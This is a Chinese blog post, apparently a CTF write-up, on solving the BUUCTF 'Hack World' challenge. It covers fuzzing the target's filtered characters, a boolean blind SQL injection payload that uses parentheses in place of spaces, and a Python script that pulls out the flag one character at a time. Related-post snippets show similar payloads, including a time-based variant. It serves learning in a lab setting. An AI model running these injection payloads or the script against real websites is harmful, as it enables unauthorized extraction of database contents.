BUUCTF:[CISCN2019 华北赛区 Day2 Web1]Hack World

最新推荐文章于 2022-03-20 19:52:49 发布
于 2020-11-05 18:11:52 发布 4242 收藏 8
分类专栏: CTF_WEB_Writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/109516952
版权

题目地址:https://buuoj.cn/challenges#[CISCN2019%20%E5%8D%8E%E5%8C%97%E8%B5%9B%E5%8C%BA%20Day2%20Web1]Hack%20World

在这里插入图片描述
在这里插入图片描述
SQL注入

手工测试时发现有过滤,那就先Fuzz测试过滤了哪些字符

在这里插入图片描述
Length=482的都是被过滤的字符

在这里插入图片描述
在这里插入图片描述
测试注入点,发现是盲注,直接查flag表flag字段的内容

Trick

  • 使用中括号()代替空格
  • 常规盲注测试,都无需查库查表查字段了,都给出来,直接查flag内容
id=(select(ascii(mid(flag,1,1))=102)from(flag))

在这里插入图片描述
编写脚本

# -*- coding:utf-8 -*-
# Author: mochu7
import requests
import string

def blind_injection(url):
	flag = ''
	strings = string.printable
	for num in range(1,60):
		for i in strings:
			payload = '(select(ascii(mid(flag,{0},1))={1})from(flag))'.format(num,ord(i))
			post_data = {"id":payload}
			res = requests.post(url=url,data=post_data)
			if 'Hello' in res.text:
				flag += i
				print(flag)
			else:
				continue
	print(flag)


if __name__ == '__main__':
	url = 'http://64368c9f-dd87-4c49-b9a1-d4b82e98c87a.node3.buuoj.cn/index.php'
	blind_injection(url)

在这里插入图片描述

末初mochu7
关注
  • 9
    点赞
  • 8
    收藏
  • 打赏
    打赏
  • 12
    评论
专栏目录
2019华北电力大学全日制学士学位招生目录1
08-03
① 101 思想政治理论 ② 201 英语一 ③ 301 数学一 ④ 811 电力系统分析基础 ① 电力系统综合 ② 高电压技术 ③ 电力电子技术 ① 发电厂电
[CISCN2019 华北赛区 Day2 Web1]Hack World1
c1516175954的博客
03-07 24
盲注 异或 if控制
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
风过江南乱的博客
06-28 1712
BUUCTF__[CISCN2019 华北赛区 Day2 Web1]Hack World_题解
华北制药:2019年半年度报告.PDF
06-02
华北制药:2019年半年度报告.PDF
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
建材行业周报:2019开局华北最强,华东平稳.zip
11-02
建材行业周报:2019开局华北最强,华东平稳
web buuctf [CISCN2019 华北赛区 Day2 Web1]Hack World1
weixin_44214568的博客
03-20 547
考点:盲注(布尔注入);异或的使用 1.输入1' 提示的是bool(错误),这里没有报错回显,只提示错误,其实就可以判断出是个布尔注入 2. 输入1' or '1=1'# 存在过滤,用bp抓包,fuzz进行爆破,看过滤了什么字符; (看回显,长度为482的都会提示sql注入,即被过滤的字符)这只能确定一部分,在实际操作中因为字符链接,字符本身都会产生新的过滤,注意一下 or的连接语句,空格等 3.根据提示 即从表flag的flag列内提取内容,根据前面的操作可知存在布尔注入,我
自己收集的一些常见SQL注入方式(持续更新中,增加了无列名注入和Timing Attack注入)
sGanYu
10-19 1626
目录 注入点位置及发现 判断输入点是否存在注入测试 数值型: 字符型: group_concat注入: union注入: limit注入: 报错注入: 布尔注入: 时间注入: 堆查询注入: 宽字节注入: base64注入: Cookie注入、Referer注入、UA注入、XFF注入 预编译注入: Handler注入(从表名查询字段名): SQL绕过WAF 通过SQL语句读写文件 注入点位置及发现: GET参数注入 POST参数注入 use.
[CISCN2019 华北赛区 Day2 Web1]Hack World
wuuconix's blog
04-02 2856
[CISCN2019 华北赛区 Day2 Web1]Hack World 这道题的考点貌似是sql盲注还是第一次遇到这种类型,表示太难了。。 主界面 它的意思是让我们给出文章的id,那我们就输入一试试。 有回显,出题人想要一个girlfriend。对此,我只想说,想peach。然后我们再输入2试试。 对这个回显,我怀疑出题人妄想症犯了。之后我们再输入3试试。 发生了错误,我们再输入万能密码试试。 好吧,它检测到sql注入了,以我目前的知识,我已经手足无措了,在网上查阅资
建材行业周报:2019开局华北最强,华东平稳.pdf
07-08
建材行业周报:2019开局华北最强,华东平稳.pdf
2019华北电力大学全日制专业学位招生目录1
08-03
① 101 思想政治理论 ② 204 英语二 ③ 302 数学二 ④ 811 电力系统分析基础 ① 电力系统综合 ② 电力电子技术 ③ 高电压技术 ① 发电厂电
华北制药:2019年半年度报告(修订版).PDF
05-27
华北制药:2019年半年度报告(修订版).PDF
华北电力大学高等数学期末考试题2018-2019第2学期(A).pdf
06-06
华北电力大学高等数学期末考试题2018-2019第2学期(A),适合考研复试以及平常期末考试复习使用
buuctf-web-[CISCN2019 华北赛区 Day2 Web1]Hack World
weixin_43345082的博客
08-10 3858
一个盲注过滤了很多东西 最后发现这样可以正常回显 id=1^(if((ascii(substr((select(flag)from(flag)),1,1))=102),sleep(3),1)) 写脚本一位位爆破,二分法找 但是因为平台的问题可能跑到一半会被限制,可以加sleep()时间或者从从下一位继续跑 #!/usr/bin/python #-*-coding:utf-8 -*- import ...
BUUCTF——Hack World
weixin_45864041的博客
12-03 916
题目告诉我们表名为flag,列名为flag 所以值查询为select flag from flag 按照提示传入id=0 传入id=1 什么都不传 现在看来应该是布尔型盲注,而且过滤了一些东西 尝试传入1^1 传入1^0 直接构造payload 1^(ascii(substr((select flag from flag),0,1))=102) 传入后可以发现,空格被过滤了 所以换一下 1^(ascii(substr((select(flag)from(flag)),0,1))=102) .
[ciscn2019 华北赛区 day2 web1]hack world 1
最新发布
03-16
很抱歉,我是一名AI语言模型,无法回答关于hack world 1的问题。如果您有其他问题需要帮助,请随时提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末初mochu7

谢谢老板!

¥2 ¥4 ¥6 ¥10 ¥20
输入1-500的整数
余额支付 (余额:-- )
扫码支付
扫码支付:¥2
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值